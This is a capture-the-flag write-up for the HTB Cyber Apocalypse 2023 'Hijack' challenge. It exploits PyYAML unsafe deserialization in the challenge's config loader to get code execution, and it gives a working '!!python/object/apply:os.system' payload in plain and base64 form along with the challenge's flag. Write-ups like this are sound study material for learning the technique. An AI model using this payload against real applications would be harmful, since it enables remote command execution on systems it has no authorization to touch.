Hijack

The security of the alien spacecrafts did not prove very robust, and you have gained access to an interface allowing you to upload a new configuration to their ship’s Thermal Control System. Can you take advantage of the situation without raising any suspicion?

Overview

Welcome to this write-up for the HTB Cyber Apocalypse CTF 2023 Misc challenge called “Hijack.” In this challenge, we are tasked with taking advantage of a security vulnerability in an alien spacecraft’s Thermal Control System (TCS) without raising any suspicion. Let’s dive into the details!

Understanding the Challenge

To start the challenge, we need to connect to the instance machine using nc (netcat) command:

nc <IP> <PORT>

Once connected, we are presented with three options in the TCS interface:

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit

The first step is to create a configuration by selecting option 1.

Creating a Configuration

Let’s take a look at the config creation process:

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 1

- Creating new config -
Temperature units (F/C/K): F
Propulsion Components Target Temperature: 70
Solar Array Target Temperature: 100
Infrared Spectrometers Target Temperature: 421
Auto Calibration (ON/OFF): ON

Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICc0MjEnLCBhdXRvX2NhbGlicmF0aW9uOiAnT04nLHByb3B1bHNpb25fdGVtcDogJzcwJywgc29sYXJfYXJyYXlfdGVtcDogJzEwMCcsIHVuaXRzOiBGfQ==

The serialized config is a base64-encoded string. To proceed, we need to decode it.

Based on prior experience, I know that the last two characters of the serialized config are ==, indicating a base64 encoding. Let’s decode it using an online tool like CyberChef.

Decoded config:

!!python/object:__main__.Config {IR_spectrometer_temp: '421', auto_calibration: 'ON', propulsion_temp: '70', solar_array_temp: '100', units: F}

Now, we have a YAML representation of the configuration. The !!python/object:__main__.Config indicates that this data can be deserialized using Python’s YAML library.

Understanding the Deserialization Exploit

To gain further insight, we researched the !!python/object:__main__.Config syntax. It turns out that it is related to PyYAML, a Python library for working with YAML. More information about PyYAML can be found here.

In our search, we came across an article about Python YAML deserialization and how it can be exploited to achieve Remote Code Execution (RCE). You can read more about it here.

The article provides details on the exploitation process. However, our teammate found a GitHub page with an exploit specifically tailored to this challenge. You can find it here.

Modifying the Exploit

We quickly modified the exploit for our specific purpose. The goal is to make the instance machine run the system command cat flag.txt using the os module when deserializing the YAML data.

!!python/object/apply:os.system ["cat flag.txt"]

The exploit, in base64-encoded form, looks like this:

ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJd

Running the Exploit

Before running the cat flag.txt command, we tried running ls to check if the exploit works and to locate the flag.txt file.

With the exploit ready, let’s load the modified configuration:

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJd

HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}
** Success **
Uploading to ship...

Boom! We successfully executed the exploit, and the flag is revealed:

HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}

We have successfully completed the “Hijack” challenge in the HTB Cyber Apocalypse CTF 2023 Misc category. By exploiting the YAML deserialization vulnerability, we gained access to the alien spacecraft’s system and retrieved the flag.